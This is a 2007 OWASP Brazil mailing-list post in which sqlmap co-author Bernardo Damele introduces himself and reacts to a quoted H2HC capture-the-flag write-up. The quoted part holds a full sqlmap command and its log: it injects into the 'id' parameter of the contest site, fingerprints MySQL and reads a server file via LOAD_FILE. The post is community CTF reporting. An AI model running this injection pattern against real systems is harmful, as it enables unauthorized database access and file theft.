[Owasp-brazil] Resultado Capture The Flag - H2HC 2007.

Bernardo Damele bernardo.damele at gmail.com
Wed Nov 14 03:58:52 EST 2007


Oi OWASP Brasil,

meu nome eh Bernardo, sou carioca mas moro na Italia a muitos anos.
Faco parte do OWASP Italy
(http://www.owasp.org/index.php/Italy#OWASP-Italy_Board) a mais ou
menos um ano e fico feliz em ver que tambem voces do OWASP Brasil
estao se organizando com atividades e encontros!

On Nov 14, 2007 2:09 AM,  <dum_dum at frontthescene.com.br> wrote:
> ...
> debian:/tmp/sqlmap# python
> sqlmap.py --url="http://webdefenderh2hc.h2hc.org.br/ctf/show_noticia_popup.php?id=8"
>  --file="/etc/H2HCdesafioWebDefender.txt" -v1
>
>     sqlmap/0.5-rc3 coded by inquis <bernardo.damele at gmail.com>
>                     and belch <daniele.bellucci at gmail.com>
>
> [*] starting at: 12:07:05
>
> [12:07:06] [INFO] testing if the url is stable, wait a few seconds
> [12:07:08] [INFO] url is stable
> [12:07:08] [INFO] testing if 'id' parameter is dynamic
> [12:07:08] [INFO] confirming that 'id' parameter is dynamic
> [12:07:08] [INFO] parameter 'id' is dynamic
> [12:07:08] [INFO] testing sql injection on parameter 'id'
> [12:07:08] [INFO] testing numeric/unescaped injection on parameter 'id'
> [12:07:09] [INFO] parameter 'id' is not numeric/unescaped injectable
> [12:07:09] [INFO] testing string/single quote injection on parameter 'id'
> [12:07:10] [INFO] confirming string/single quote injection on parameter 'id'
> [12:07:10] [INFO] parameter 'id' is string/single quote injectable
> [12:07:10] [INFO] testing MySQL
> [12:07:10] [INFO] query: CONCAT('7', '7')
> [12:07:10] [INFO] retrieved: 77
> [12:07:17] [INFO] performed 20 queries in 6 seconds
> [12:07:17] [INFO] confirming MySQL
> [12:07:17] [INFO] query: LENGTH('7')
> [12:07:17] [INFO] retrieved: 1
> [12:07:20] [INFO] performed 13 queries in 3 seconds
> [12:07:20] [INFO] query: SELECT 7 FROM information_schema.TABLES LIMIT 0, 1
> [12:07:20] [INFO] retrieved: 7
> [12:07:25] [INFO] performed 13 queries in 4 seconds
> remote DBMS:    MySQL >= 5.0.0
>
> [12:07:25] [INFO] fetching file: '/etc/H2HCdesafioWebDefender.txt'
> [12:07:25] [INFO] query: LOAD_FILE('/etc/H2HCdesafioWebDefender.txt')
> [12:07:25] [INFO] retrieved:
> ...

Que legal ver que voces utilizarom meu programa sqlmap como dimostracao aqui ;-)

-- 
Bernardo Damele

Email address: bernardo.damele (at) gmail.com
Mobile number: +39 3493821385


More information about the Owasp-brazil mailing list